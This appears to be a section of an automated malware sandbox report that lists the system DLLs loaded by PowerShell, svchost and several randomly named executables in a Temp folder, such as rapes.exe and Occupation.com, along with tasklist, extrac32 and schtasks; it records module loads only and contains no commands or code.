                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: mstask.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: dui70.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: duser.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: chartv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: oleacc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: atlthunk.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: wtsapi32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: winsta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: windows.fileexplorer.common.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: explorerframe.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: propsys.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: edputil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: appresolver.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: bcp47langs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: slc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: shfolder.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: propsys.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: riched20.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: usp10.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: msls31.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: textinputframework.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: coremessaging.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: ntmarta.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: textshaping.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: edputil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: appresolver.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: bcp47langs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: slc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\SysWOW64\expand.exeSection loaded: cabinet.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: wsock32.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: mpr.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: ntmarta.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: napinsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: pnrpnsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: wshbth.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: nlaapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: dnsapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: winrnr.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: rasadhlp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comSection loaded: apphelp.dll
                                    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
